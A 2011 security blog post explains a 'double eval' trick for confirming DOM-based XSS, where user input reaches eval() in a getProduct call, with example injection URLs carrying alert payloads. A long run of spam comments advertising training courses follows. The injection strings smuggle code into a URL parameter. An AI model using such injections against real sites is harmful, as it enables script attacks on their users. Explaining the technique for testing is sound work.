Friday, December 02, 2011

Double eval() for DOM based XSS


DOM based XSS are becoming relatively common with Web 2.0 and Ajax driven applications. DOM based applications are using eval() method to inject new stream into the existing DOM. In certain cases it is becoming tricky to pass on the values for pen-testing and to create an abuse/exploit scenario. Recently during consulting we came across different DOM based XSS and objective is to get a pop-up to confirm the vulnerability. If we get an eval call then it is possible to double eval-ing to convert text back into payload.

Here is a simple scenario; it can be complicated on case to case basis.
For example, we have following line in the code

eval('getProduct('+ koko.toString()+')');

Here “koko” is coming from URL or controlled by user. Hence, if we pass on the value in following URL it gets to the “getProduct” function.

Testing scenario is simple, it causes DOM based XSS with following condition.

We are passing payload terminating function, ending statement and commenting out rest of the script. We get a simple pop-up if we pass on following code.

But to prove a point if we want to craft any other payload where we need to send single quote, for example want to execute “document.getElementsByName('Login')” will not work since we have that single quote that will raise syntax error. For simplicity if we pass on alert(‘hi’), it will not work and we will not get popup in above scenario.

We get following error in the browser.

Error: syntax error
Source File: http://192.168.3.2/catalog.aspx?pid=3%27);elval(alert(%27hi%27));//
Line: 37, Column: 29
Source Code:
getProduct(3%27);elval(alert(%27hi%27));//)

Interestingly, we can leverage double eval() in this case, we pass on following payload and let’s see what happens…

It will avoid error and we will get a pop-up. What we did was simple, we used fromCharCode function and passed on decimal values for alert(‘hi’) here, first eval will convert it into string and second eval will execute the code. Hence, double eval can rescue while testing DOM based XSS.

Curiously I searched this trick on web if people are using it and came across this article - http://blogs.msdn.com/b/infopath/archive/2006/04/05/569338.aspx
Double eval() can be leveraged for string operations and concatenation.

18 comments:

Jeremy said...

Wouldn't escaping the single tick work too? As in:

http://192.168.3.2/catalog.aspx?pid=3);alert(\'test\');//

shreeraj said...

Nop. It will not work - going through URL browser will not process. It may work through POST params.

Error: illegal character
Source File: http://192.168.3.2/catalog.aspx?pid=2%27);alert(\%27hi\%27)//
Line: 37, Column: 23
Source Code:
getProduct(2%27);alert(\%27hi\%27)//)

digi mark said...

This is most informative and also this post most user friendly and super navigation to all posts... Thank you so much for giving this information to me.. 

automation anywhere training in chennai

automation anywhere training in bangalore

automation anywhere training in pune

automation anywhere online training

blueprism online training

rpa Training in sholinganallur

rpa Training in annanagar

iot-training-in-chennai

blueprism-training-in-pune

automation-anywhere-training-in-pune

sathyaramesh said...

I am really enjoyed a lot when reading your well-written posts. It shows like you spend more effort and time to write this blog. I have saved it for my future reference. Keep it up the good work.
RPA Training in Chennai
RPA Training Institute in Chennai
Robotic Process Automation Training
Robotics courses in bangalore
RPA classes in bangalore

jefrin adams said...

Really good to read this post
IOT training institute in chennai

Unknown said...

Excellent Article. Thanks Admin


DevOps Training in Chennai

Cloud Computing Training in Chennai

IT Software Training in Chennai

Unknown said...

Excellent Article. Thanks Admin
Data Science Training in Chennai

DevOps Training in Chennai

Hadoop Big Data Training

Python Training in Chennai

jefrin adams said...

Great blog very good to read
best matlab training in chennai

VRITPROFESSIONALS said...

Nice post. Thanks for sharing! I want people to know just how good this information is in your article. It’s interesting content and Great work.
Thanks & Regards,
VRIT Professionals,
No.1 Leading Web Designing Training Institute In Chennai.

And also those who are looking for
Web Designing Training Institute in Chennai
SEO Training Institute in Chennai
Photoshop Training Institute in Chennai
PHP & Mysql Training Institute in Chennai
Android Training Institute in Chennai

Sadhana Rathore said...

Your site is amazing and your blogs are informative. I have bookmarked this blog for my reference.
Automation Anywhere Training in Chennai
Automation Training Institute in Chennai
Automation Anywhere course in Chennai
RPA Training Institute in Chennai
RPA Training in Chennai
RPA Training in Velachery
Blue Prism Training Institute in Chennai
Blue Prism Training in Chennai
RPA course in Chennai

ProPlus Logics said...

Hey Nice Blog!! Thanks For Sharing!!!Wonderful blog & good post.Its really helpful for me, waiting for a more new post. Keep Blogging!
SEO company in coimbatore
SEO company
web design company in coimbatore

Vicky Ram said...

Nice post. I learned some new information. Thanks for sharing.

Guest posting sites
Education

Sivanandhana Girish said...

Thanks for your efforts in sharing this post with us. This was really awesome. kindly keep continuing the great work.
Spoken English Classes in Chennai
IELTS Coaching in Chennai
English Speaking Classes in Mumbai
IELTS Classes in Mumbai
IELTS Coaching in Mumbai
IELTS Mumbai
Best IELTS Coaching in Mumbai
IELTS Center in Mumbai

Unknown said...

I am outstandingly glad to see this post. It is interesting and edifying. Such a lovely post, I am appreciative and I like this post. Moreover, I should need to share one thing which is a foundation for learning python, which is the most mentioning now every day. For that, you can join at this association

Pythan Training in Greater Noida
Pythan coaching in Greater Noida
Pythan institute in Greater Noida
Pythan classes in Greater Noida


Vivek said...

Thangs for shareing this Blog I am very happy to see this such a valuable

information, you are doing good job keep continue on Blogging job here you can do

C++ Training in Greater Noida at Mirorsoft Technologies It can be used for low-

level programming, such as writing scripts for drivers and kernels, and also

supports high-level programming language functions, such as writing scripts for

software applications, etc.
C++ Language Training In Greater Noida
C++ Language Training Institute In Greater Noida
C++ Language Course In Greater Noida
C++ Language Classes In Greater Noida

Vivek said...

Thangs for shareing this Blog I am very happy to see this such a valuable

information, you are doing good job keep continue on Blogging job here you can do

C++ Training in Greater Noida at Mirorsoft Technologies It can be used for low-

level programming, such as writing scripts for drivers and kernels, and also

supports high-level programming language functions, such as writing scripts for

software applications, etc.
C++ Language Training In Greater Noida
C++ Language Training Institute In Greater Noida
C++ Language Course In Greater Noida
C++ Language Classes In Greater Noida

htop said...

thank you so much for sharing this useful message to us
best java training in chennai
best python training in chennai
selenium training in chennai
selenium training in omr
selenium training in sholinganallur

priyanka usha said...

This is really a great information about this technology.
IoT Training in Chennai
Internet of Things Training in Chennai
TOEFL Training in Chennai
french courses in chennai
Best Spoken English Class in Chennai
IELTS Training in Chennai
IoT Training in Velachery
German classes in anna nagar
spoken english class anna nagar